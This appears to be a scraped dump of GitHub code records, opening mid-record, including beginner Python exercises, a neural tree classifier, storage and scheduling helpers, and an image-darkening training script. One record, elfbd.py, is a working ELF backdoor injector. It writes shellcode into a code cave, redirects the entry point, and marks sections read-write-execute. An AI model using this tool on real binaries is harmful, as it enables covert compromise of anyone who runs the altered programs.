f'o valor {valor} celsius convertido para fahrenheit é: {valor1}'\n\nprint(celsius(int(input(\"digite um valor inteiro \"))))\n\ndef repetir(valor,valor1):\n valor2= valor.count(valor1)\n return f'o {valor1} se repete: {valor2}'\n\nvalor=input('digite palavras separadas por espaço ')\nvalor1=input('digite a letra que quer saber a quantidade que se repete ')\nprint(repetir(valor,valor1))\n\ndef media(valor,valor1,valor2,valor3):\n valor4= (valor+valor1+valor2+valor3)/4\n \n return f'a media das 4 notas é: {valor4}'\nvalor=float(input('digite o 1º valor '))\nvalor1=float(input('digite o 2º valor '))\nvalor2=float(input('digite o 3º valor '))\nvalor3=float(input('digite o 4º valor '))\nprint(media(valor,valor1,valor2,valor3))\n\n\ndef maior():\n lista = []\n while True:\n n = int(input('Digite o número :'))\n b = input(\"deseja continuar [S/N] \").upper()\n lista.append(n)\n if b == 'N':\n break\n return f' numero maior:{max(lista)}\\n numero menor:{min(lista)}'\n \n \nprint(maior())\n\nimport math\n\ndef area(valor):\n valor1=math.pi*(valor*valor)\n return f'a area do circula é :{round(valor1,2)}'\n\nprint(area(12))\n\n ","repo_name":"hugoerico/aula14","sub_path":"felipe_exercicio45678.py","file_name":"felipe_exercicio45678.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26950696062","text":"import torch\nimport numpy as np\nimport copy\n\nimport torch.nn as nn\nfrom utils.globals import *\n\n\ninner_nodes = {}\nnode_dict = {}\nlabel2id = {}\ntree = None\n\n\nclass InferTree(nn.Module):\n def __init__(self, arch, num_classes, dim, criterion, lamb, device) -> None:\n super().__init__()\n self.num_classes = num_classes\n self.dim = dim\n self.criterion = criterion\n self.lamb = lamb\n self.device = device\n\n global tree, node_dict, label2id\n node_dict = get_value('node_dict')\n label2id = get_value('label2id')\n tree = get_value('tree')\n tree.prob = 1.\n tree.path_prob = 1.\n\n self.depth = 0\n if arch == 'cifar10':\n self.depth = 5\n elif arch == 'cifar100':\n self.depth = 10\n elif arch == 'tiny-imagenet':\n self.depth = 10\n elif arch == 'imagenet':\n self.depth = 13\n\n # if arch == 'cifar10':\n # self.depth = 12\n # elif arch == 'cifar100':\n # self.depth = 14\n # elif arch == 'tiny-imagenet':\n # self.depth = 13\n # elif arch == 'imagenet':\n # self.depth = 14\n\n for i in range(self.depth):\n inner_nodes[i+1] = []\n self.__build_tree()\n\n self.env_params = {}\n\n def __build_tree(self):\n def build(node, layer):\n node.set_weight(torch.rand(1, self.dim).to(self.device))\n node.set_layer(layer)\n layers = [\n # nn.Conv2d(self.dim, self.dim, kernel_size=1, stride=1, bias=False),\n nn.Linear(self.dim, node.num_child()+1)\n ]\n # 增加一个类别表示分类错误(需要返回到父节点)?,\n\n node.set_subid(get_value('label2id'))\n classifier = nn.Sequential(*layers).to(self.device)\n node.set_classifier(classifier)\n inner_nodes[node.layer].append(node)\n\n for i in node.children.keys():\n build(node.children[i], layer+1)\n return 0\n\n node = tree\n if node.is_leaf() or node == None:\n # node error\n return None\n build(node, 1)\n return node\n\n def forward(self, x, labels):\n penalty = torch.tensor(0.0).to(self.device)\n out = torch.zeros([x.shape[0], self.num_classes+1], dtype=torch.float32).to(self.device)\n\n for l, nodes in inner_nodes.items():\n for node in nodes:\n if node.is_leaf():\n continue\n x_t = x + node.weight.expand_as(x)\n sub_output = node.classifier(x_t)\n prob = torch.softmax(sub_output, dim=1)\n # sub_labels = []\n # for label in labels.cpu().numpy():\n # lp = get_value('lpaths')[label]\n # if len(lp) <= l:\n # sub_labels.append(0)\n # else:\n # sub_labels.append(node.get_subid(lp[l]))\n # sub_labels = torch.as_tensor(sub_labels).to(self.device)\n\n # penalty += self.criterion(prob, sub_labels, len(node.children)+1) / l\n\n node.sub_prob = copy.copy(prob).data\n node.decay = torch.ones((x.shape[0], 1)).to(self.device)\n for i, child in node.children.items():\n # child.prob = sub_output[:, i+1]\n child.path_prob = prob[:, i+1] * node.path_prob\n if child.is_leaf():\n idx = get_value('label2id')[child.wnid]\n out[:, idx] += child.path_prob\n\n return out[:, 1:]\n\n def infer_hard(self, x):\n out = torch.zeros([x.shape[0], 2], dtype=torch.float32).to(self.device)\n\n for i in range(x.shape[0]):\n node = inner_nodes[1][0]\n path = [node.wnid]\n while not node.is_leaf():\n pred = node.choose_child(i)\n if pred == 0:\n p = node.parent\n for k, v in p.children.items():\n if v.wnid == node.wnid:\n break\n p.sub_prob[i][k+1] = 0\n node = p\n else:\n node = node.children[pred-1]\n path.append(node.wnid)\n out[i][0] = label2id[path[-1]] - 1\n\n while node.parent != None:\n p = node.parent\n for k, v in p.children.items():\n if v.wnid == node.wnid:\n break\n if node.is_leaf():\n p.decay[i] = 1 - p.sub_prob[i][k+1]\n p.sub_prob[i][k+1] = 0\n else:\n p.decay[i] = 1 - p.sub_prob[i][k+1] * (1 - node.decay[i])\n node = p\n\n # second infer\n node = inner_nodes[1][0]\n sec_path = [node.wnid]\n while not node.is_leaf():\n for k, v in node.children.items():\n if v.is_leaf():\n node.sub_prob[i][k+1] *= 1\n else:\n node.sub_prob[i][k+1] *= v.decay[i].item()\n pred = node.choose_child(i)\n if pred == 0:\n p = node.parent\n for k, v in p.children.items():\n if v.wnid == node.wnid:\n break\n p.sub_prob[i][k+1] = 0\n node = p\n else:\n node = node.children[pred-1]\n sec_path.append(node.wnid)\n out[i][1] = label2id[sec_path[-1]] - 1\n\n return out\n","repo_name":"Jesson-Guo/neural-symbolic-Multi-granularity-classification","sub_path":"src/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3590152410","text":"from domain import UnavailabilityTime\n\n\ndef create_event(session, userId, title, startTime, endTime, periodicity):\n \"\"\"\n Function to create an event\n :param session: session\n :param userId: Integer, user id\n :param title: String, reason why unavailable\n :param startTime: DateTime, from what time is unavailable\n :param endTime: DateTime, to what time is unavailable\n :param periodicity: Integer, Daily = 1, Weekly = 2, One-Off = 3\n \"\"\"\n event = UnavailabilityTime(userId=userId, title=title, start=startTime, end=endTime,\n periodicity=periodicity)\n session.add(event)\n # session.expunge(question)\n session.flush()\n return event.eventId\n\n\ndef remove_event(session, userId, eventId):\n \"\"\"\n Function to remove an event\n :param session: session\n :param userId: Integer, user id, who want to remove an event\n :param eventId: Integer, event id want to remove\n :return: True: remove successful\n False: remove failed\n \"\"\"\n existing = session.query(UnavailabilityTime).filter(UnavailabilityTime.userId == userId,\n UnavailabilityTime.eventId == eventId).first()\n if existing is not None and existing.status is True:\n existing.status = False\n return True\n return False\n\n\ndef update_event(session, userId, eventId, startTime, endTime, title, periodicity):\n \"\"\"\n Function to update an event\n :param session: session\n :param userId: Integer, user id, who want to update an event\n :param eventId: Integer, user id, which event to be updated\n :param title: String, reason why unavailable\n :param startTime: DateTime, from what time is unavailable\n :param endTime: DateTime, to what time is unavailable\n :param periodicity: Integer, Daily = 1, Weekly = 2, One-Off = 3\n :return: True: update successful\n False: update failed\n \"\"\"\n event = session.query(UnavailabilityTime).filter(UnavailabilityTime.userId == userId,\n UnavailabilityTime.eventId == eventId).first()\n\n if not event.status:\n return False\n event.startTime = startTime\n event.endTime = endTime\n event.title = title\n event.periodicity = periodicity\n return True\n\n\ndef fetch_event(session, userId):\n \"\"\"\n Find all unavailable events for specified user\n :param session: session\n :param userId: user id\n \"\"\"\n events = session.query(UnavailabilityTime) \\\n .filter(UnavailabilityTime.status == 1, UnavailabilityTime.userId == userId).all()\n # We need to use objects after this session closed\n session.expunge_all()\n return events\n","repo_name":"TechlauncherFireApp/FireApp3.0","sub_path":"backend/repository/unavailability_repository.py","file_name":"unavailability_repository.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"9757327204","text":"from random import randint\n\"\"\"\nЗадание №4\n✔ Функция получает на вх��д список чисел.\n✔ Отсортируйте его элементы in place без использования\nвстроенных в язык сортировок.\n✔ Как вариант напишите сортировку пузырьком.\nЕё описание есть в википедии.\n\"\"\"\n\n\ndef sort_(data: list):\n ind = 0\n while ind < len(data):\n for first in range(len(data) - 1):\n if data[first] > data[first + 1]:\n data[first + 1], data[first] = data[first], data[first + 1]\n ind += 1\n return data\n\nlst = [randint(-1000, 1000) for _ in range(10)]\nprint(lst)\nresult = sort_(lst)\nprint(result)","repo_name":"jonmd87/immersion_python","sub_path":"venv/seminars/Seminar_4/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"71026041337","text":"#!usr/bin/python\nfrom datastuff import *\nfrom array import array\nimport testdata as t\n\ndef getMaxChunks(space_id):\n max_chunks = -1\n if space_id == 'd':\n #tomi dropbox\n max_chunks = 1000\n elif space_id == 'g':\n #tomi google\n max_chunks = 1000\n return max_chunks\n\ndef getUsedChunks(space_id):\n used_chunks = -1\n if space_id == 'd':\n #tomi dropbox\n used_chunks = 100\n\n elif space_id == 'g':\n #tomi google\n used_chunks = 100\n return used_chunks\n\n# file is a bytes array\ndef upload_req(file, filename, size):\n # first verify if enough space\n d_available = getMaxChunks('d') - getUsedChunks('d')\n g_available = getMaxChunks('g') - getUsedChunks('g')\n if (d_available + g_available) * CHUNK_SIZE < size:\n return \"NOT_ENOUGH_SPACE\"\n\n start_chunk, start_offset = get_last_used_chunk_and_offset()\n\n if start_offset == CHUNK_SIZE:\n start_chunk = start_chunk + 1\n # reset the starting offset for the next chunk\n start_offset = DEFAULT\n\n chunks, chunk_IDs, end_offset = split(start_chunk, start_offset, size, file)\n\n add_file_to_filelist(filename, chunk_IDs, start_offset, end_offset)\n\n # store ranges\n for i in xrange(len(chunk_IDs) - 1):\n set_chunk_offset(chunk_IDs[i], CHUNK_SIZE)\n\n #last chunk\n set_chunk_offset(chunk_IDs[len(chunk_IDs) - 1], size % CHUNK_SIZE)\n\n return upload_storage(chunks, chunk_IDs)\n\n# primit de la frontend\ndef download_req(filename, testFlag):\n chunk_start = get_file_start_offest(filename)\n chunk_end = get_file_end_offset(filename)\n \n chunk_numbers = get_file_chunks(filename) # list of chunk numbers\n\n # print chunk_start, ' ', chunk_end, ' ', chunk_numbers\n\n # request la tomi pentru chunks\n chunks = download_storage(chunk_numbers, testFlag)\n \n final_file = []\n if len(chunk_numbers) == 1:\n final_file = chunks[0][chunk_start : chunk_end]\n else:\n final_file = chunks[0][chunk_start:]\n for i in xrange(1, len(chunks_numbers) - 1):\n final_file = final_file + chunks[i]\n final_file = final_file + chunks[len(chunks_numbers) - 1][:chunk_end]\n\n return final_file\n\ndef download_storage(chunk_numbers, testing):\n #request la tomi\n chunks = []\n \n #TODO remove when not testing\n if testing:\n for i in xrange(len(chunk_numbers)):\n chunks.append(t.test_CHUNKS[chunk_numbers[i]]) \n\n return chunks\n\n# trimis lui tomi\ndef upload_storage(chunks, chunk_IDs):\n #files = generate_files(chunks)\n # call la tomi cu files\n #print \"CHUNKS\", chunks, chunk_IDs\n spaces = ['d', 'g']\n # bad code:\n used_chunks = getUsedChunks('d') + getUsedChunks('g')\n max_used_chunks_d = getMaxChunks('d')\n max_used_chunks_g = getMaxChunks('g')\n\n for chunk in chunks:\n #TODO: trimis request de upload lui tomi\n if used_chunks > max_used_chunks_d:\n a = 1\n #TODO: trimis request de upload google\n else:\n a = 1\n #TODO: trimis request de upload dropbox\n used_chunks = used_chunks + 1\n return chunks, chunk_IDs\n\n# request lui tomi\ndef list_storage(userID):\n filelist = get_file_list()\n\n return filelist.keys()\n\n# write the file to a list of chunks\n# start chunk is requested and overwritten from the last file's offset\n# returns:\n# 1. the list of data chunks\n# 2. the list of associated chunk IDs\ndef split(start_chunk, start_offset, size, file):\n # TODO check if file fits in one chunk only\n offset = 0\n end_offset = 0\n chunk_number = start_chunk\n\n chunk_list = []\n chunk_IDs = []\n\n if start_offset > 0:\n initial_chunk, start_offset = req_chunk(start_chunk)\n\n if size < CHUNK_SIZE - start_offset:\n end_offset = start_offset + size\n else:\n end_offset = CHUNK_SIZE\n\n initial_chunk[start_offset:end_offset] = file[0 : (CHUNK_SIZE - start_offset)]\n size = size - (CHUNK_SIZE - start_offset)\n offset = CHUNK_SIZE - start_offset\n chunk_list.append(initial_chunk)\n chunk_IDs.append(chunk_number)\n chunk_number = chunk_number + 1\n\n while size > 0:\n if size < CHUNK_SIZE:\n new_chunk = array(\"B\", CHUNK_SIZE * '0')\n new_chunk[0 : size] = file[offset:]\n end_offset = size\n chunk_IDs.append(chunk_number)\n else:\n new_chunk = file[offset : offset + CHUNK_SIZE]\n offset = offset + CHUNK_SIZE\n end_offset = CHUNK_SIZE\n chunk_IDs.append(chunk_number)\n chunk_number = chunk_number + 1\n\n size = max(0, size - CHUNK_SIZE)\n\n chunk_list.append(new_chunk)\n\n return chunk_list, chunk_IDs, end_offset\n\n# makes request to storage backend for the chunk last chunk that is\n# available for writing\n# also returns the offset where we can start writing in that chunk\n# TODO implementation\ndef req_chunk(start_chunk):\n # returns initial_chunk data, start_offset\n # return array(\"B\", \"g\"), 1\n return t.test_CHUNKS[start_chunk], chunk_index[start_chunk]\n","repo_name":"TomyRO/Mango","sub_path":"functii.py","file_name":"functii.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36578001708","text":"import pywhatkit\nimport time\nimport openpyxl\nfrom pathlib import Path\n\n# xlsx_file = Path('Guests.xlsx')\nxlsx_file = Path('Test.xlsx')\nwb_obj = openpyxl.load_workbook(xlsx_file)\nsheet = wb_obj.active\nrows = list(sheet.iter_rows())[2:]\n\nname_index = 0\nphone_index = 4\nwith_out_point_index = 9\nisrael_area = \"+972\"\ntext_message = \" היקרים!\\nאנחנו שמחים ונרגשים להזמינכם לחגוג עימנו את יום נישואינו!\"\n\nnames = []\nphone_numbers = []\n\nfor row in rows:\n if row[name_index].value is not None and row[phone_index].value is not None:\n names.append(row[name_index].value)\n clean_phone_number = str(row[phone_index].value)[:with_out_point_index]\n with_are_code = israel_area + str(clean_phone_number)\n phone_numbers.append(with_are_code)\n\n print(str(row[name_index].value) + \": \" + str(with_are_code))\nprint(len(phone_numbers))\nguests = zip(names, phone_numbers)\nfor guest in guests:\n print(guest[0])\n pywhatkit.sendwhats_image(guest[1], \"WeddingInvitation.jpeg\", guest[0] + text_message, 20, True, 5)\n time.sleep(1)\n","repo_name":"stavih19/MessagesWideDistribution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"9181212592","text":"#!/usr/bin/env python3\n\nimport sys\nsys.dont_write_bytecode = True\n\nimport struct\nfrom os import chmod\nfrom argparse import ArgumentParser\nfrom ELF.ELF import ELF\nfrom ELF.ELFEnum import *\nfrom log import Log\n\n\nprettyHex = lambda x: (hex(x) if isinstance(x, int) else ' '.join(hex(i) for i in x))\n\n\ndef gen_sc_wrapper(legit_e_entry, new_e_entry, shellcode, breakpoint, arch=ELFHeaderEnum.Class.ELF32.value, legit_instr=None):\n sc_wrapper = b\"\"\n sc_wrapper += b\"\\xe8\\x00\\x00\\x00\\x00\\x54\\x50\\x53\\x51\\x52\\x55\\x56\\x57\" # pushes\n if arch == ELFHeaderEnum.Class.ELF64.value:\n sc_wrapper += b\"\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\"\n if breakpoint:\n sc_wrapper += b\"\\xcc\"\n sc_wrapper += shellcode\n if arch == ELFHeaderEnum.Class.ELF64.value:\n sc_wrapper += b\"\\x41\\x5f\\x41\\x5e\\x41\\x5d\\x41\\x5c\\x41\\x5b\\x41\\x5a\\x41\\x59\\x41\\x58\"\n sc_wrapper += b\"\\x5f\\x5e\\x5d\\x5a\\x59\\x5b\\x58\\x5c\" # popes\n if legit_instr:\n sc_wrapper += legit_instr\n else:\n sc_wrapper += b\"\\x5b\"\n if arch == ELFHeaderEnum.Class.ELF64.value:\n sc_wrapper += b\"\\x48\"\n sc_wrapper += b\"\\x81\\xeb\"\n sc_wrapper += new_e_entry\n if arch == ELFHeaderEnum.Class.ELF64.value:\n sc_wrapper += b\"\\x48\"\n sc_wrapper += b\"\\x81\\xc3\"\n sc_wrapper += legit_e_entry\n sc_wrapper += b\"\\x53\"\n sc_wrapper += b\"\\xc3\"\n\n return sc_wrapper\n\ndef get_args():\n p = ArgumentParser()\n p.add_argument(\"-b\", \"--binary\", help=\"Binary path to backdoor\", required=True)\n p.add_argument(\"-s\", \"--shellcode\", help=\"Path to the raw shellcode (file)\", required=True)\n p.add_argument(\"-l\", \"--location\", help=\"Hex value of where to put the shellcode\", required=True)\n p.add_argument(\"-e\", \"--entry\", help=\"Where the shellcode should be called (default: binary entry point)\", default=None)\n p.add_argument(\"--breakpoint\", help=\"Add a breakpoint (\\\\xcc) at the begining of the shellcode\", action='store_true')\n\n return p.parse_args()\n\n\ndef main():\n args = get_args()\n log = Log(True)\n\n with open(args.binary, \"rb\") as f:\n binData = f.read()\n\n elf = ELF(binData)\n\n with open(args.shellcode, \"rb\") as f:\n shellcode = f.read()\n\n loc = int(args.location, 16)\n entry = int(args.entry, 16) if args.entry else None\n\n if elf.ei_mag != b\"\\x7f\\x45\\x4c\\x46\":\n log.error(\"Binary is not an ELF file. Exiting...\")\n return 1\n\n safe_cc = True\n for i in (elf.elf_file[loc], elf.elf_file[loc]+len(shellcode), 1):\n off = loc+i\n if elf.elf_file[off] != 0x00:\n safe_cc = False\n\n if not safe_cc:\n log.warn(\"Warning: selected codecave doesn't only contain null bytes\")\n\n secid = elf.get_section_id_from_offset(loc)\n phid = elf.get_prog_hdr_id_from_offset(loc)\n\n if entry:\n legit_loc = entry\n else:\n if elf.ei_class == ELFHeaderEnum.Class.ELF64.value:\n legit_loc = elf.e_entry\n else:\n legit_loc = elf.e_entry - elf.program_headers[phid].p_vaddr\n\n sc = gen_sc_wrapper(elf.p(\"I\", legit_loc), elf.p(\"I\", loc+5), shellcode, args.breakpoint, elf.ei_class)\n\n end_secid = elf.get_section_id_from_offset(loc+len(sc))\n end_phid = elf.get_prog_hdr_id_from_offset(loc+len(sc))\n\n if not phid:\n log.error(\"Error, location is outside of a program header.\")\n return\n\n elif not end_phid:\n log.warn(f\"Program header {log.construct(log.colors.fg.GREEN, ProgramHeaderEnum.Type(elf.program_headers[phid].p_type).name, log.colors.format.RESET)} is finishing before the end of the shellcode.\")\n resp = input(\"Increase its size? [Y/n] \")\n if resp.lower() != 'n':\n prev_size = elf.program_headers[phid].p_filesz\n elf.program_headers[phid].p_filesz = elf.program_headers[phid].p_filesz + len(sc)\n elf.program_headers[phid].p_memsz = elf.program_headers[phid].p_memsz + len(sc)\n log.info(f\"Previous size: {log.construct(log.colors.fg.CYAN, prettyHex(prev_size), log.colors.format.RESET)} Bytes | New size: {log.construct(log.colors.fg.CYAN, prettyHex(elf.program_headers[phid].p_filesz), log.colors.format.RESET)} Bytes\")\n\n elif elf.program_headers[phid].p_type != elf.program_headers[end_phid].p_type:\n log.error(\"Error! The shellcode is overlapping 2 program headers. Find another place.\")\n elf.program_headers[phid].print_program_header()\n elf.program_headers[end_phid].print_program_header()\n return\n\n\n if not secid:\n print(\"[x] Error, location is outside of a section.\")\n return\n\n elif not end_secid:\n log.warn(f\"Section {log.construct(log.colors.fg.GREEN, elf.section_headers[secid].sh_name_str, log.colors.format.RESET)} is finishing before the end of the shellcode.\")\n resp = input(\"Increase its size? [Y/n] \")\n if resp.lower() != 'n':\n prev_size = elf.section_headers[secid].sh_size\n elf.section_headers[secid].sh_size = elf.section_headers[secid].sh_size + len(sc)\n log.info(f\"Previous size: {log.construct(log.colors.fg.CYAN, prettyHex(prev_size), log.colors.format.RESET)} Bytes | New size: {log.construct(log.colors.fg.CYAN, prettyHex(elf.section_headers[secid].sh_size), log.colors.format.RESET)} Bytes\")\n\n elif elf.section_headers[secid].sh_name != elf.section_headers[end_secid].sh_name:\n log.error(\"Error! The shellcode is overlapping 2 sections. Find another place.\")\n elf.section_headers[secid].print_section_header()\n elf.section_headers[end_secid].print_section_header()\n return\n\n\n log.info(\"Setting required program header flags...\")\n elf.program_headers[phid].setFlags(ProgramHeaderEnum.Flags.PF_X.value | ProgramHeaderEnum.Flags.PF_W.value | ProgramHeaderEnum.Flags.PF_R.value)\n log.success(f\"Program header flags: {log.construct(log.colors.fg.MAGENTA, elf.program_headers[phid].prettyFlags(), log.colors.format.RESET)}\")\n\n log.info(\"Setting required section flags...\")\n elf.section_headers[secid].setFlags(SectionHeaderEnum.Flags.SHF_EXECINSTR.value | SectionHeaderEnum.Flags.SHF_WRITE.value | SectionHeaderEnum.Flags.SHF_ALLOC.value)\n log.success(f\"Section flags: {log.construct(log.colors.fg.MAGENTA, elf.section_headers[secid].prettyFlags(), log.colors.format.RESET)}\")\n\n\n if entry:\n new_instr = b\"\\xe8\" + elf.p(\"i\", loc-entry)\n import capstone\n md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)\n i=0\n legit_instrs = b\"\"\n for (addr, size, mnem, op_str) in md.disasm_lite(bytes(elf.elf_file[entry:entry+0x10]), entry):\n legit_instrs += elf.elf_file[entry+i:entry+size+i]\n i += size\n if i >= len(new_instr):\n break\n new_instr = new_instr + (b\"\\x90\"*(len(legit_instrs)-len(new_instr)))\n\n elf.elf_file[entry:entry+len(new_instr)] = new_instr\n sc = gen_sc_wrapper(elf.p(\"I\", legit_loc), elf.p(\"I\", loc+5), shellcode, args.breakpoint, elf.ei_class, legit_instrs)\n else:\n elf.e_entry = loc \\\n if elf.ei_class == ELFHeaderEnum.Class.ELF64.value \\\n else loc + elf.program_headers[phid].p_vaddr\n\n elf.elf_file[loc:loc+len(sc)] = sc\n\n newBinData = elf.build_elf()\n\n newFileName = f\"./{args.binary.split('/')[-1]}.bdoor\"\n with open(newFileName, \"wb\") as f:\n f.write(newBinData)\n chmod(newFileName, 0o755)\n\n log.success(f\"Backdoored file written at {log.construct(log.colors.fg.YELLOW, newFileName, log.colors.format.RESET)}!\")\n\n return 0\n\n\n\nif __name__=='__main__':\n exit(main())\n","repo_name":"wr34k/elf-backdoor","sub_path":"elfbd.py","file_name":"elfbd.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"13752913233","text":"import torchvision\nimport torch.optim\nimport os\nimport argparse\nimport time\n# from dataloader import ImageDataset\nfrom model import enhance_net_nopool_v2 as enhance_net_nopool # we use v2 in our paper (quadratic curve)\nimport loss_func\nimport numpy as np\nfrom torchvision import transforms\nimport torch\nfrom utils.utils import *\nimport numpy as np\nfrom utils.resnet import resnet101\nfrom PIL import Image\n\ndef make_dataset(dir):\n images = []\n assert os.path.isdir(dir), '%s is not a valid directory' % dir\n\n for root, _, fnames in sorted(os.walk(dir)):\n for fname in fnames:\n # if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n print(len(images))\n return images\n\nclass ImageDataset(torch.utils.data.Dataset):\n def __init__(self, root='', height=256, width=256, transform=None, path=False):\n if transform is None:\n self.transform = transforms.Compose([\n transforms.Resize((height, width)),\n transforms.ToTensor()\n ])\n else:\n self.transform = transform\n self.paths = sorted(make_dataset(root))\n self.path = path\n\n self.size = len(self.paths) # get the size of dataset A\n\n def __getitem__(self, index):\n # make sure index is within then range\n path = self.paths[index]\n A_img = Image.open(path).convert('RGB')\n # apply image transformation\n A = self.transform(A_img)\n\n # print(A.shape,B.shape)\n if self.path:\n return A, path\n else:\n return A\n\n def __len__(self):\n return len(self.paths)\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef train(args):\n\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n scale_factor = args.scale_factor\n DCE_net = enhance_net_nopool(scale_factor, curve_round=args.curve_round,\n encode_dim=args.encode_dim,\n down_scale=args.down_scale).cuda()\n\n DCE_net.train()\n\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop((224,224)),\n transforms.ToTensor(),\n ])\n \n mean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]\n\n train_dataset = ImageDataset(args.lowlight_images_path, transform=transform)\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.train_batch_size, shuffle=True, num_workers=args.num_workers, pin_memory=True, drop_last=True)\n\n L_color = loss_func.L_color()\n L_down = loss_func.L_down()\n L_exp = loss_func.L_exp(args.patch_size, args.exp_weight)\n L_tv = loss_func.L_TV(mid_val=args.tv_mid)\n\n if args.sim:\n L_sim = loss_func.L_sim()\n resnet = resnet101(pretrained=True, return_last_feature=True).cuda().eval()\n resnet.requires_grad_ = False\n else:\n L_sim = None\n\n optimizer = torch.optim.Adam(DCE_net.parameters(\n ), lr=args.lr, weight_decay=args.weight_decay)\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(\n optimizer, milestones=[int(i) for i in args.decreasing_lr.split(',')], gamma=0.1)\n\n DCE_net.train()\n low_exp, high_exp = args.exp_range.split('-')\n low_exp, high_exp = float(low_exp), float(high_exp)\n\n iteration = 1\n ltv, ldown, lcol, lexp, lsim = AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter()\n ltotal = AverageMeter()\n while iteration <= args.max_iters:\n for img in train_loader:\n exp = torch.rand(args.train_batch_size, 1, 1, 1).cuda() * (high_exp - low_exp) + low_exp\n\n img = img.cuda()\n\n darkened_img, [enhance_r, down_scale] = DCE_net(img, exp)\n real_exp = darkened_img[0].mean().item()\n ori_exp = img[0].mean().item()\n if iteration % 50 == 0:\n torchvision.utils.save_image(\n darkened_img[0], 'checkpoints/'+args.experiment+'/outputs/'+str(iteration)+f'-{(exp[0].item()):.2f}-{real_exp:.2f}.png')\n torchvision.utils.save_image(\n img[0], 'checkpoints/'+args.experiment+'/outputs/'+str(iteration)+f'-gt-{ori_exp:.2f}.png')\n\n loss = 0.\n loss_TV = args.tv_weight * L_tv(enhance_r)\n loss += loss_TV\n ltv.update(loss_TV.item(), args.train_batch_size)\n\n loss_col = args.color_weight*torch.mean(L_color(darkened_img))\n loss += loss_col\n lcol.update(loss_col.item(), args.train_batch_size)\n\n loss_down = args.down_weight*L_down(down_scale)\n loss += loss_down\n ldown.update(loss_down.item(), args.train_batch_size)\n\n if L_sim is not None:\n # normalize\n img_norm = (img - torch.tensor(mean).view(3, 1, 1).cuda()) / torch.tensor(std).view(3, 1, 1).cuda()\n darkened_img_norm = (darkened_img - torch.tensor(mean).view(3, 1, 1).cuda()) / torch.tensor(std).view(3, 1, 1).cuda()\n out_ori = resnet(img_norm)\n out_low = resnet(darkened_img_norm)\n loss_sim = L_sim([out_ori], [out_low]) * args.sim_weight\n loss += loss_sim\n lsim.update(loss_sim.item(), args.train_batch_size)\n else:\n loss_sim = torch.zeros(1)\n\n loss_exp = torch.mean(L_exp(darkened_img, exp))\n loss += loss_exp\n lexp.update(loss_exp.item(), args.train_batch_size)\n\n ltotal.update(loss.item(), args.train_batch_size)\n\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm(\n DCE_net.parameters(), args.grad_clip_norm)\n optimizer.step()\n\n if ((iteration+1) % args.display_iter) == 0:\n log.info('Iter [{}/{}] Loss: {:.4f} Loss_TV: {:.4f} Loss_down: {:.4f} Loss_col: {:.4f} Loss_exp: {:.4f}, Loss_sim {:4f}'.format(\n iteration+1, args.max_iters, loss.item(), loss_TV.item(), loss_down.item(), loss_col.item(), loss_exp.item(), loss_sim.item()))\n \n iteration += 1\n scheduler.step()\n \n if iteration > args.max_iters:\n break\n\n if iteration % 1000 == 0:\n torch.save(DCE_net.state_dict(\n ), 'checkpoints/' + args.experiment + \"/Iter\" + str(iteration) + '.pth')\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n # Input Parameters\n parser.add_argument('--lowlight_images_path', type=str,\n default=\"../visual-place-recognition/dataset/train/120k\",\n )\n parser.add_argument('--lr', type=float, default=1e-4)\n parser.add_argument('--weight_decay', type=float, default=1e-4)\n parser.add_argument('--decreasing_lr', default='1000,3000', type=str)\n parser.add_argument('--grad_clip_norm', type=float, default=0.1)\n parser.add_argument('--max_iters', type=int, default=5000)\n parser.add_argument('--train_batch_size', type=int, default=8)\n parser.add_argument('--num_workers', type=int, default=4)\n parser.add_argument('--display_iter', type=int, default=10)\n parser.add_argument('--snapshot_iter', type=int, default=10)\n parser.add_argument('--scale_factor', type=int, default=1)\n parser.add_argument('--experiment', type=str,\n required=True, help=\"Name of the folder where the checkpoints will be saved\")\n parser.add_argument('--exp_range', type=str, default='0-0.5')\n parser.add_argument('--gpu_id', type=str, default='0')\n parser.add_argument('--patch_size', type=int, default=1)\n parser.add_argument('--width', type=int, default=224)\n parser.add_argument('--height', type=int, default=224)\n parser.add_argument('--exp_weight', type=float, default=10)\n parser.add_argument('--color_weight',type=float,default=25)\n\n parser.add_argument('--tv_weight',type=float,default=1600)\n parser.add_argument('--tv_mid', type=float, default=0.02)\n parser.add_argument('--sim',action='store_true')\n parser.add_argument('--sim_weight',type=float,default=0.1)\n parser.add_argument('--curve_round',type=int,default=8)\n\n parser.add_argument('--encode_dim',type=int,default=1)\n 